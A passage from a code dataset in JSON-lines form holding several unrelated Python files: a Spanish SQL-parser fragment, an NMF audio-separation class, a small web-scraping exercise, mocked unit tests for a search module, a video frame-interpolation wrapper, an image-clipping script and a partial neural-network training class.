OrderByBurbuja(self,lista,index):\n print('Index '+str(index))\n \n \n\n return sorted_rank\n \n\n def retornador_index(self, id, lista_campo):\n\n contador = -1\n\n for campo in lista_campo: # RECORRO LOS NOMBRES DE LOS CAMPOS DE LA TS\n contador += 1 # INDICA LA POSICION DE LA COLUMNA DONDE OBTENGO LOS VALORES\n\n if (id == campo):\n return contador\n\n return -1\n \n def existencia_grupby(self, valor, lista,index):\n\n for recorido in lista:\n contadorG = 0\n for columnAA in recorido:\n if contadorG == index:\n if str(columnAA) == str(valor[index]):\n return False\n contadorG+=1\n\n return True\n\n def metodo_sis(self,lista):\n lista_original = []\n contador = 0\n\n for recorido in lista[0].lista:\n lista_aux = []\n for columna in lista:\n lista_aux.append(columna.lista[contador])\n contador+=1\n lista_original.append(lista_aux) \n\n return lista_original\n\n def metodo_Pegre(self, dato, lista):\n aux = lista\n contador = 0\n #bandera = True\n\n for recorrido in aux:\n if (recorrido == dato):\n contador += 1\n else:\n pass\n\n return contador\n\n","sub_path":"parser/team23/instruccion/select_normal.py","file_name":"select_normal.py","file_ext":"py","file_size_in_byte":11041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"563325418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport math\nimport random\n\nimport numpy as np\n\nimport audio_signal\nimport constants\nfrom nussl.separation import separation_base\n\n\nclass NMF(separation_base.SeparationBase):\n \"\"\"\n This is an implementation of the Non-negative Matrix Factorization algorithm for\n source separation. This implementation receives an audio_signal object\n and a number, num_templates, which defines the number of bases vectors.\n\n This class provides two implementations of distance measures, EUCLIDEAN and DIVERGENCE,\n and also allows the user to define distance measure function.\n\n References:\n [1] Lee, Daniel D., and H. Sebastian Seung. \"Algorithms for non-negative matrix factorization.\"\n Advances in neural information processing systems. 2001.\n \"\"\"\n\n def __str__(self):\n return \"Nmf\"\n\n # TODO: Change this so that NMF accepts an AudioSignal object and not a raw stft\n def __init__(self, input_audio_signal, num_templates,\n activation_matrix=None, templates=None, distance_measure=None,\n should_update_template=None, should_update_activation=None):\n self.__dict__.update(locals())\n super(NMF, self).__init__(input_audio_signal=input_audio_signal)\n\n if num_templates <= 0:\n raise Exception('Need more than 0 bases!')\n\n self.stft = self.audio_signal.stft(overwrite=False) # V in literature\n self.num_templates = num_templates\n\n if self.stft.size <= 0:\n raise Exception('STFT size must be > 0!')\n\n if activation_matrix is None and templates is None:\n self.templates = np.zeros((self.stft.shape[0], num_templates)) # W, in literature\n self.activation_matrix = np.zeros((num_templates, self.stft.shape[1])) # H, in literature\n self.randomize_input_matrices()\n elif activation_matrix is not None and templates is not None:\n self.templates = templates\n self.activation_matrix = activation_matrix\n else:\n raise Exception('Must provide both activation matrix and template vectors or nothing at all!')\n\n self.distance_measure = distance_measure if distance_measure is not None else DistanceType.DEFAULT\n self.should_update_template = True if should_update_template is None else should_update_template\n self.should_update_activation = True if should_update_activation is None else should_update_activation\n\n self.should_use_epsilon = False # Replace this with something more general\n self.epsilon_euclidean_type = True\n self.stopping_epsilon = 1e10\n self.max_num_iterations = 20\n\n def run(self):\n \"\"\"\n This runs the NMF separation algorithm. This function assumes that all\n parameters have been set prior to running.\n\n No inputs. do_STFT and N must be set prior to calling this function.\n\n Returns an activation matrix (in a 2d numpy array)\n and a set of template vectors (also 2d numpy array).\n \"\"\"\n\n if self.stft is None or self.stft.size == 0:\n raise Exception('Cannot do NMF with an empty STFT!')\n\n if self.num_templates is None or self.num_templates == 0:\n raise Exception('Cannot do NMF with no bases!')\n\n if self.should_use_epsilon:\n print('Warning: User is expected to have set stopping_epsilon prior to using'\n ' this function. Expect this to take a long time if you have not set'\n ' a suitable epsilon.')\n\n should_stop = False\n num_iterations = 0\n while not should_stop:\n\n self.update()\n\n # Stopping conditions\n num_iterations += 1\n if self.should_use_epsilon:\n if self.epsilon_euclidean_type:\n should_stop = self._euclidean_distance() <= self.stopping_epsilon\n else:\n should_stop = self._divergence() <= self.stopping_epsilon\n else:\n should_stop = num_iterations >= self.max_num_iterations\n\n return self.activation_matrix, self.templates\n\n def update(self):\n \"\"\"\n Computes a single update using the update function specified.\n :return: nothing\n \"\"\"\n # update activation matrix\n if self.should_update_activation:\n if self.distance_measure == DistanceType.EUCLIDEAN:\n self.activation_matrix = self._update_activation_euclidean()\n\n elif self.distance_measure == DistanceType.DIVERGENCE:\n self.activation_matrix = self._update_activation_divergent()\n\n # update template vectors\n if self.should_update_template:\n if self.distance_measure == DistanceType.EUCLIDEAN:\n self.templates = self._update_template_euclidean()\n\n elif self.distance_measure == DistanceType.DIVERGENCE:\n self.templates = self._update_template_divergence()\n\n def _update_activation_euclidean(self):\n # make a new matrix to store results\n activation_copy = np.empty_like(self.activation_matrix)\n\n # store in memory so we don't have to do n*m calculations.\n template_T = self.templates.T\n temp_T_stft = np.dot(template_T, self.stft)\n temp_T_act = np.dot(np.dot(template_T, self.templates), self.activation_matrix)\n\n # Eq. 4, H update from [1]\n for indices, val in np.ndenumerate(self.activation_matrix):\n result = temp_T_stft[indices]\n result /= temp_T_act[indices]\n result *= self.activation_matrix[indices]\n activation_copy[indices] = result\n\n return activation_copy\n\n def _update_template_euclidean(self):\n # make a new matrix to store results\n template_copy = np.empty_like(self.templates)\n\n # store in memory so we don't have to do n*m calculations.\n activation_T = self.activation_matrix.T\n stft_act_T = np.dot(self.stft, activation_T)\n temp_act = np.dot(np.dot(self.templates, self.activation_matrix), activation_T)\n\n # Eq. 4, W update from [1]\n for indices, val in np.ndenumerate(self.templates):\n result = stft_act_T[indices]\n result /= temp_act[indices]\n result *= self.templates[indices]\n template_copy[indices] = result\n\n return template_copy\n\n def _update_activation_divergent(self):\n # make a new matrix to store results\n activation_copy = np.empty_like(self.activation_matrix)\n\n dot = np.dot(self.templates, self.activation_matrix)\n\n # Eq. 5, H update from [1]\n for indices, val in np.ndenumerate(self.activation_matrix):\n (a, mu) = indices\n result = sum((self.templates[i][a] * self.stft[i][mu]) / dot[i][mu]\n for i in range(self.templates.shape[0]))\n result /= sum(self.templates[k][a] for k in range(self.templates.shape[0]))\n result *= self.activation_matrix[indices]\n activation_copy[indices] = result\n\n return activation_copy\n\n def _update_template_divergence(self):\n # make a new matrix to store results\n template_copy = np.empty_like(self.templates)\n\n dot = np.dot(self.templates, self.activation_matrix)\n\n # Eq. 5, W update from [1]\n for indices, val in np.ndenumerate(self.templates):\n (i, a) = indices\n result = sum((self.activation_matrix[a][mu] * self.stft[i][mu]) / dot[i][mu]\n for mu in range(self.activation_matrix.shape[1]))\n result /= sum(self.activation_matrix[a][nu] for nu in range(self.activation_matrix.shape[1]))\n result *= self.templates[indices]\n template_copy[indices] = result\n\n return template_copy\n\n def _euclidean_distance(self):\n try:\n mixture = np.dot(self.templates, self.activation_matrix)\n except:\n print(self.activation_matrix.shape, self.templates.shape)\n return\n\n if mixture.shape != self.stft.shape:\n raise Exception('Something went wrong! Recombining the activation matrix '\n 'and template vectors is not the same size as the STFT!')\n\n return sum((self.stft[index] - val) ** 2 for index, val in np.ndenumerate(mixture))\n\n def _divergence(self):\n mixture = np.dot(self.activation_matrix, self.templates)\n\n if mixture.shape != self.stft.shape:\n raise Exception('Something went wrong! Recombining the activation matrix '\n 'and template vectors is not the same size as the STFT!')\n\n return sum(\n (self.stft[index] * math.log(self.stft[index] / val, 10) + self.stft[index] - val)\n for index, val in np.ndenumerate(mixture))\n\n def make_audio_signals(self):\n # TODO: this!\n raise NotImplementedError('This does not work yet.')\n signals = []\n for stft in self.recombine_calculated_matrices():\n signal = audio_signal.AudioSignal(stft=stft)\n signal.istft()\n signals.append(signal)\n return signals\n\n def recombine_calculated_matrices(self):\n new_matrices = []\n for n in range(self.num_templates):\n matrix = np.empty_like(self.activation_matrix)\n matrix[n, ] = self.activation_matrix[n, ]\n\n new_stft = np.dot(self.templates, matrix)\n new_matrices.append(new_stft)\n return new_matrices\n\n def randomize_input_matrices(self, shouldNormalize=False):\n self._randomize_matrix(self.activation_matrix, shouldNormalize)\n self._randomize_matrix(self.templates, shouldNormalize)\n\n @staticmethod\n def _randomize_matrix(M, shouldNormalize=False):\n for i, row in enumerate(M):\n for j, col in enumerate(row):\n M[i][j] = random.random()\n\n if not shouldNormalize:\n M[i][j] *= constants.DEFAULT_MAX_VAL\n return M\n\n def plot(self, outputFile, **kwargs):\n raise NotImplementedError('Sorry, you cannot do this yet.')\n\n\nclass DistanceType:\n EUCLIDEAN = 'euclidean'\n DIVERGENCE = 'divergence'\n DEFAULT = EUCLIDEAN\n\n def __init__(self):\n pass\n","sub_path":"nussl/Nmf.py","file_name":"Nmf.py","file_ext":"py","file_size_in_byte":10328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"44589263","text":"# -*- coding:utf-8 -*-\n# @Time :2019/7/11 22:22\n# @Author: Athany\n# @File : 7.11-Spider- etree练习糗事百科.py\n\n\"\"\"\n爬取糗事百科\n分析:\n1. 需要用到requests爬取页面,用xpath,re来提取数据\n2. 可提取信息:用户头像链接,段子内容,点赞次数\n3. 保存到json文件中\n\n大致分三部分:\n1. down页面\n2. xpath提取信息\n3. 保存文件,落地\n\"\"\"\n\nimport requests\nfrom lxml import etree\n\n\nurl = \"https://www.qiushibaike.com/\"\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\"\n}\n\nrsp = requests.get(url, headers=headers)\nhtml = rsp.text\n\n# 把页面解析成html\nhtml = etree.HTML(html)\nprint(html.text)\nrst = html.xpath('//div[contains(@id, \"qiushi_tag\")]')\nprint(rst)\n\nfor r in rst:\n print(r)\n content = r.xpath('//div[@class=\"content\"]/span')[0].text.strip().encode('utf-8')\n print(content)\n","sub_path":"习题课/7.11-Spider- etree练习糗事百科.py","file_name":"7.11-Spider- etree练习糗事百科.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"581529328","text":"\"\"\"Unit tests for ducksearch module.\"\"\"\nfrom unittest import TestCase, mock, main\nimport json\nimport ducksearch\nimport wordlist\nfrom request_mock import mocked_requests_get\n\n\nclass TestDucksearch(TestCase):\n \"\"\"Ducksearch unit test suite.\"\"\"\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_word_list_search_result_size(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check the number results returned is the same as the wordlist size.\"\"\"\n json_result = ducksearch.search_word_list()\n result = json.loads(json_result)\n self.assertEqual(len(result), wordlist.NUMBER_OF_WORDS)\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[\"a\", \"b\", \"c\"])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_no_request_sent_if_cached_value(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check no request is sent to duckduckgo if there is a cached value.\"\"\"\n ducksearch.get_top_three_titles_json(\"something\")\n mock_get.assert_not_called()\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_parse_result(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check parsed titles match expected value.\"\"\"\n expected_value = [\n \"This is a test ad\",\n \"Test - Wikipedia\",\n \"Test | Definition of Test by Merriam-Webster\"\n ]\n result = ducksearch.get_top_three_titles(\"something\")\n self.assertListEqual(result, expected_value)\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_cache_push(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check an attempt is made to cache value, if no cached value provided.\"\"\"\n titles = [\n \"This is a test ad\",\n \"Test - Wikipedia\",\n \"Test | Definition of Test by Merriam-Webster\"\n ]\n search_term = \"something\"\n ducksearch.get_top_three_titles(search_term)\n mock_redis_lpush.assert_called_with(search_term, *titles)\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_valid_json(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check the result provided is valid json.\"\"\"\n json_result = ducksearch.get_top_three_titles_json(\"something\")\n try:\n json.loads(json_result)\n\n except ValueError:\n self.fail(\"get_top_three_titles_json return invalid json\")\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test_ducksearch.py","file_name":"test_ducksearch.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"596291871","text":"import os\n\nimport numpy\nimport torch\n\nfrom vrt import dictionaries, utils\nfrom . import networks\n\n\nclass RTer:\n def __init__(\n self,\n height, width,\n model_path=None, default_model_dir=None,\n sf=2, resize_hotfix=False,\n net_name='DAIN_slowmotion', rectify=False, useAnimationMethod=False,\n *args, **kwargs\n ):\n torch.backends.cudnn.enabled = True\n torch.backends.cudnn.benchmark = True\n torch.set_grad_enabled(False)\n # Save parameters\n self.sf = sf\n self.resize_hotfix = resize_hotfix\n self.network = net_name\n # Initialize pader\n self.pader = utils.modeling.Pader(\n width, height, 128, extend_func='replication'\n )\n self.dim = self.pader.paded_size\n # Solve for model path\n if model_path is None:\n model_path = os.path.abspath(os.path.join(\n default_model_dir, dictionaries.model_paths['dain']\n ))\n utils.folder.check_model(model_path)\n # Initilize model\n self.model = networks.__dict__[self.network](\n padding=self.pader.slice,\n channel=3, filter_size=4,\n timestep=1/self.sf, rectify=rectify, useAnimationMethod=useAnimationMethod,\n training=False\n ).cuda()\n # Load state dict\n model_dict = self.model.state_dict()\n pretrained_dict = {k: v for k, v in torch.load(model_path).items() if k in model_dict}\n model_dict.update(pretrained_dict)\n self.model.load_state_dict(model_dict)\n self.model.eval()\n # Initialize batch\n self.need_to_init = True\n\n def get_output_effect(self):\n return {\n 'height': 1,\n 'width': 1,\n 'fps': self.sf\n }\n\n def ndarray2tensor(self, frame: list):\n frame = torch.from_numpy(frame[0].copy()).cuda()\n frame = frame.permute(2, 0, 1)\n frame = frame.unsqueeze(0)\n frame = frame.float()\n frame /= 255.0\n frame = self.pader.pad(frame)\n return frame\n\n def tensor2ndarray(self, tensor):\n tensor = torch.stack(tensor)\n if self.resize_hotfix:\n tensor = utils.modeling.resize_hotfix(tensor)\n tensor = tensor.clamp(0.0, 1.0)\n tensor *= 255.0\n tensor = tensor.byte()\n tensor = tensor.permute(0, 2, 3, 1)\n tensor = tensor.cpu().numpy()\n return tensor\n\n def rt(self, frame, *args, **kwargs):\n if self.need_to_init:\n self.need_to_init = False\n self.tensor_1 = self.ndarray2tensor(frame)\n self.ndarray_1 = frame\n return []\n self.tensor_0, self.tensor_1 = self.tensor_1, self.ndarray2tensor(frame)\n self.ndarray_0, self.ndarray_1 = self.ndarray_1, frame\n I0 = self.tensor_0\n I1 = self.tensor_1\n intermediate_frames = self.model(I0, I1)\n intermediate_frames = self.tensor2ndarray(intermediate_frames)\n return_ = [self.ndarray_0[0], *intermediate_frames]\n if kwargs['duplicate']:\n return_.extend([frame[0], frame[0]])\n return return_\n","sub_path":"vrt/vfin/dain/rter.py","file_name":"rter.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"570858241","text":"import cv2 as cv\nimport argparse\nfrom pathlib import Path\nimport utils\n\n\ndef main():\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--image\", required=True, help=\"path to the input image\")\n ap.add_argument(\"-p\", \"--prefix\", required=False, help=\"prefix for clipped image\", default=\"converted\")\n args = vars(ap.parse_args())\n\n image = cv.imread(args[\"image\"])\n clipped_image = utils.detect(image)\n\n # parse file location\n image_path = Path(args[\"image\"]).resolve()\n image_dir = image_path.parent\n image_name = image_path.name\n image_extension = image_path.suffix\n\n # save image\n cv.imwrite('{}/{}_{}{}'.format(image_dir, args[\"prefix\"], image_name, image_extension), clipped_image)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"core/Cliper.py","file_name":"Cliper.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"582509425","text":"import kero.utils.utils as ut\nimport numpy as np\n\n# print(\"@NeuralNetwork.py\")\n# print(\"@utils.utils test:\")\n# ut.test()\n# print(\"@@\")\n\nclass NeuralNetwork:\n\tdef __init__(self):\n\t\tprint(\"Initializing a Neural Network object.\")\n\t\tself.is_consistent = None\n\n\t\tself.weights = None\n\t\tself.biases = None\t\n\t\t\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th LAYER\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\n\t\tself.number_of_neurons = None\n\t\tself.number_of_input = None # number_of_neurons[0]\n\t\tself.number_of_output = None # number_of_neurons[-1]\n\t\t#----------------------------------------\n\t\t# This is set when initiate_neural_network_general() is called\n\t\t#\n\t\t# number_of_neurons : given L layers, then this is the list \n\t\t# [N1,N2,...,NL] where Nj is the number of neurons in the j-th layer\n\t\t# number_of_input = N1\n\t\t# number_of_output = NL\n\n\t\tself.learning_rate=1e-5\n\t\t#----------------------------------------\n\t\t#\n\t\t#\n\n\t\treturn\n\n\t# NN.L1\n\tdef initiate_neural_network(self,bulk, mode=None,\n\t\tverbose = False,\n\t\tverbose_init_mode=False,\n\t\tverbose_consistency=False):\n\t\tif verbose>0 : print(\" + Initiate_neural_network(). Mode = \", mode)\n\t\tif mode is None:\n\t\t\tweights = bulk[\"weights\"]\n\t\t\tbiases = bulk[\"biases\"]\n\t\t\tself.initiate_neural_network_general(weights, biases,\n\t\t\t\tverbose=verbose_init_mode,\n\t\t\t\tverbose_consistency=verbose_consistency)\n\t\t# elif mode == \"uniform\":\n\t\t# \tinitial_value = bulk[\"initial_value\"]\n\t\t# \tneuron_number = bulk[\"neuron_number\"]\n\n\t\treturn\n\n\t# NN.L2\n\tdef initiate_neural_network_general(self,weights, biases,\n\t\tverbose=False,\n\t\tverbose_consistency=False):\n\t\tif verbose>0 : print(\" -+ initiate_neural_network_general().\")\n\t\t# ---------------------------------------\n\t\t# Initialize weights and biases manually\n\t\t# weights : see the format in __init__(self)\n\t\t# biases : see the format in __init__(self)\n\t\tis_consistent, number_of_neurons = self.neuron_number_consistency_check(weights, biases,\n\t\t\tverbose=verbose_consistency)\n\t\tself.number_of_neurons = number_of_neurons\n\t\tself.number_of_input = number_of_neurons[0]\n\t\tself.number_of_output = number_of_neurons[-1]\n\t\tself.is_consistent = is_consistent\n\n\t\tself.weights = weights\n\t\tself.biases = biases\n\t\treturn\n\n\t# NN.L3\n\tdef neuron_number_consistency_check(self, weights, biases, verbose=False):\n\t\t# ---------------------------------------\n\t\t# weights : see the format in __init__(self)\n\t\t# biases : see the format in __init__(self)\n\t\t# return\n\t\t# is_consistent : bool, if true, then the inputs are compatible as Neural Network\n\t\t# number_of_neurons : list [n1,n2,...nL], number of neurons in layer 1 to L,\n\t\t# where layer 1 is the input layer and layer L the output layer\n\t\tis_consistent = True\n\t\tnumber_of_neurons = []\n\t\tif verbose>0: print(\" --+ neuron_number_consistency_check().\") \n\t\tn_layer = 2\n\t\tfor w_l in weights:\n\t\t\tis_matrix_bool, row_size, col_size = ut.list_is_matrix(w_l)\n\t\t\tif verbose>10: print(\" layer: \", n_layer-1, \" to \", n_layer)\n\t\t\tif verbose>10: print(\" is_matrix/row/col = \", is_matrix_bool,\"/\", row_size,\"/\", col_size)\n\t\t\tif not is_matrix_bool:\n\t\t\t\tprint(\" inconsistent weight matrix found [1]. Exiting with:\")\n\t\t\t\treturn False, []\n\t\t\tif n_layer == 2:\n\t\t\t\tnumber_of_neurons = number_of_neurons + [col_size, row_size]\n\t\t\telse:\n\t\t\t\tif number_of_neurons[-1] != col_size:\n\t\t\t\t\tprint(\" inconsistent weight matrix found [2]. Exiting.\")\n\t\t\t\t\tif verbose>10: print(\" \", number_of_neurons,\" || \", col_size)\n\t\t\t\t\treturn False, []\n\t\t\t\tnumber_of_neurons = number_of_neurons + [row_size]\n\t\t\tn_layer = n_layer + 1\n\t\tnumber_of_neurons_2 = []\n\t\tfor b_l in biases:\n\t\t\tnumber_of_neurons_2 = number_of_neurons_2 + [len(b_l)]\n\t\tif len(number_of_neurons_2)+1==len(number_of_neurons):\n\t\t\tfor j in range(1,len(number_of_neurons)):\n\t\t\t\tif number_of_neurons[j] != number_of_neurons_2[j-1]:\n\t\t\t\t\tprint(\" inconsistent weight-bias dimensions [2]. Exiting.\")\n\t\t\t\t\tif verbose>10: print(\" 1. \", number_of_neurons)\n\t\t\t\t\tif verbose>10: print(\" 2. \", number_of_neurons_2)\n\t\t\t\t\treturn False, []\n\t\telse:\n\t\t\tprint(\" inconsistent weight-bias dimensions [1]. Exiting.\")\n\t\t\tif verbose>10: print(\" 1. \", number_of_neurons)\n\t\t\tif verbose>10: print(\" 2. \", number_of_neurons_2)\n\t\t\treturn False, []\n\t\treturn is_consistent, number_of_neurons\n\t# NN.Ex.L1\n\tdef print_neural_network_information(self,verbosity=1):\n\t\tprint(\" > print_neural_network_verbose_information().\")\n\t\t# is_consistent, number_of_neurons=self.neuron_number_consistency_check(self.weights, self.biases, verbose=False)\n\t\t \n\t\tprint(\" Dimension consistent? :\", self.is_consistent)\n\t\tprint(\" Layers? [Input, 2,3,..., Output] :\", self.number_of_neurons)\n\t\tif verbosity>5: print(\" -> no of input/output = \",self.number_of_input,\"/\", self.number_of_output)\n\t\tprint(\" Learning rate : \",self.learning_rate)\n\t\tif verbosity>0:\n\t\t\t# TODO: add more information\n\t\t\tpass\n\t\treturn\n\t# NN.Ex.L2\n\n\nclass NetworkUpdater():\n\tdef __init__(self):\n\t\tself.current_weights = None # (list, not in numpy matrix)\n\t\tself.current_biases = None # (list)\n\t\tself.learning_rate = None # (float)\n\t\tself.number_of_neurons = None # list [N1,N2,...,NL]\n\t\tself.number_of_input = None # number_of_neurons[0]\n\t\tself.number_of_output = None # number_of_neurons[-1]\n\t\t#------------------------------------------------------------\n\t\t# These properties are the same as that of NeuralNetwork\n\n\t\tself.input_set = None \n\t\tself.Y0_set = None \n\t\t#------------------------------------------------------------\n\t\t# input_set :\n\t\t# - list of numpy matrix [x]. Each x a column vector m x 1, m the number of neurons in input layer.\n\t\t# Y0_set :\n\t\t# - list of numpy matrix [Y0]. Each Y0 nx1, where n is the no of neurons in layer l=L\n\t\t# The true/observed values in the output layer corresponding to the input set.\n\t\t# In another words, for each k=1,...,N, Y0_set[k] = f(x[k]) where f is the true function that\n\t\t# our neural network is modelling and N the number of data points.\n\n\t\tself.method = \"RegularStochastic\"\n\t\tself.method_specific_settings = None # (dictionary)\n\t\t\n\t\treturn\n\n\t# NU.L1\n\n\tdef update_wb(self, input_set, Y0_set, weights, biases, AF,\t\n\t\tmse_mode=\"compute_only\",\t\n\t\tverbose=False):\n\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th layer\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\t\t# input_set : list of numpy matrix [x]. Each x a column vector m x 1, m the number of neurons in input layer \n\t\t# AF : activationFunction object\n\n\t\t# mse_mode\n\t\t# None: do not compute mse at all\n\t\t# \"compute_only\" : \n\t\t# \"compute_and_print\" : \n\n\t\t# back-propagation\n\t\t# Assume the following have been called:\n\t\t# set_training_data()\n\t\t# set_neural_network()\n\t\t# set_settings()\n\n\t\tprint(\" + update_wb().\")\n\t\tmse_list = []\n\t\t\n\t\tif mse_mode is not None:\n\t\t\tY_set = []\n\t\t\tn = len(input_set)\n\t\t\tfor j in range(n): # for each data points\n\t\t\t\ta_l_set, _ = self.feed_forward( weights, biases, input_set[j], AF,\n\t\t\t\t\t\t\t\t\tverbose=False,\n\t\t\t\t\t\t\t\t\tmatrix_formatting=\"%6.2f\")\n\t\t\t\tY_set.append(a_l_set[-1])\n\t\t\tcurrent_mse = MSE(Y_set,Y0_set)\n\t\t\tmse_list.append(current_mse)\n\t\t\tif mse_mode is \"compute_and_print\":\t\n\t\t\t\tprint(\" Intital mse = \",current_mse)\t\n\n\t\tweights_next = weights[:]\n\t\tbiases_next = biases[:]\n\n\t\tif self.method==\"RegularStochastic\":\n\t\t\tbatch_size = self.method_specific_settings[\"batch_size\"]\n\t\t\tno_of_epoch = self.method_specific_settings[\"no_of_epoch\"]\n\t\t\tdo_shuffle = self.method_specific_settings[\"shuffle_batch\"]\n\t\t\tif verbose>20:\n\t\t\t\tprint(\" batch size = \",batch_size)\n\t\t\t\tprint(\" no of epoch = \", no_of_epoch)\n\t\t\t\tprint(\" shuffle batch = \", do_shuffle)\n\t\t\t\n\t\t\tfor epoch_i in range(no_of_epoch):\n\t\t\t\tif verbose>20: print(\" epoch : \", epoch_i+1)\n\t\t\t\tcollection_of_batches, index_partition = ut.partition_list(input_set, batch_size, do_shuffle=do_shuffle )\n\t\t\t\tpartition_of_Y0_set, _ = ut.partition_list(Y0_set, index_partition)\n\n\t\t\t\tif verbose>30:\n\t\t\t\t\tfor xx,yy in zip(collection_of_batches, partition_of_Y0_set):\n\t\t\t\t\t\t# \tprint(xx,\"\\n\",yy)\n\t\t\t\t\t\tprint(\" * partition size consistency check: \", len(xx),\" and \",len(yy))\n\t\t\t\t\t\tprint(\" * --------------------------------------\")\n\t\t\t\t\t\n\t\t\t\tfor i in range(len(collection_of_batches)):\n\t\t\t\t\t# Recall: each batch (list of numpy matrix) is a subset of input_set\n\t\t\t\t\tinput_set_batch = collection_of_batches[i] # is input_set - like\n\t\t\t\t\tY0_set_batch = partition_of_Y0_set[i]\n\t\t\t\t\tif verbose>40: \n\t\t\t\t\t\tprint(\" batch \", i, \" : \")\n\t\t\t\t\t#print(\" input_set_batch :\\n\",input_set_batch)\n\t\t\t\t\t\n\t\t\t\t\tfor x in input_set_batch:\n\t\t\t\t\t\t# Recall: each x (numpy matrix) is an element of input_set\n\t\t\t\t\t\tif verbose>30:\n\t\t\t\t\t\t\tut.print_numpy_matrix(x,formatting=\"%6.2f\",no_of_space=10)\n\t\t\t\t\t\t\tprint(\" -------\")\n\t\t\t\t\tweights_next, biases_next = self.update_wb_regular_stochastic(input_set_batch, Y0_set_batch,\n\t\t\t\t\t\tweights_next, biases_next, AF)\n\n\t\t\t\t# for accuracy measurement\n\t\t\t\t# Y0_set :list of numpy matrix over all data points\n\t\t\t\tif mse_mode is not None:\n\t\t\t\t\tY_set_next = []\n\t\t\t\t\tn = len(input_set)\n\t\t\t\t\tfor j in range(n): # for each data points\n\t\t\t\t\t\ta_l_set_next, _ = self.feed_forward( weights_next, biases_next, input_set[j], AF,\n\t\t\t\t\t\t\t\t\t\t\tverbose=False,\n\t\t\t\t\t\t\t\t\t\t\tmatrix_formatting=\"%6.2f\")\n\t\t\t\t\t\tY_set_next.append(a_l_set_next[-1])\n\t\t\t\t\tcurrent_mse = MSE(Y_set_next,Y0_set)\n\t\t\t\t\tmse_list.append(current_mse)\n\t\t\t\t\tif mse_mode is \"compute_and_print\":\t\n\t\t\t\t\t\tprint(\" current_mse = \",current_mse)\n\n\t\treturn weights_next, biases_next, mse_list\n\n\tdef set_settings(self, method=\"RegularStochastic\",\n\t\tmethod_specific_settings={\"batch_size\":4,\"no_of_epoch\":1}):\n\t\t# List all available methods here\n\t\t#\n\t\t# method = \"RegularStochastic\"\n\t\t# method_specific_settings:\n\t\t# batch_size: (integer)\n\t\t# no_of_epoch: (integer)\n\t\t# shuffle_batch : (bool)\n\t\t#------------------------------------------------------------\n\t\t# Given n data points. Partition to m = ceil(n/batch_size) batches\n\t\t# For every update wb_n to wb_(n+1), average the contribution to gradient descent\n\t\t# for all batches\n\t\t#\tIn this implementation, 1 epoch is 1 update\n\t\tself.method = method\n\t\tself.method_specific_settings = method_specific_settings\n\t\treturn\n\n\tdef set_training_data(self,input_set,Y0_set):\n\t\t# See __init__() for arguments explanations\n\t\tself.input_set = input_set\n\t\tself.Y0_set = Y0_set\n\t\treturn\n\n\tdef set_neural_network(self, NeuralNetwork):\n\t\t# NeuralNetwork (NeuralNetwork): assume initiated, with weights and biases\n\t\t# i.e. assume initiate_neural_network_general() has been called 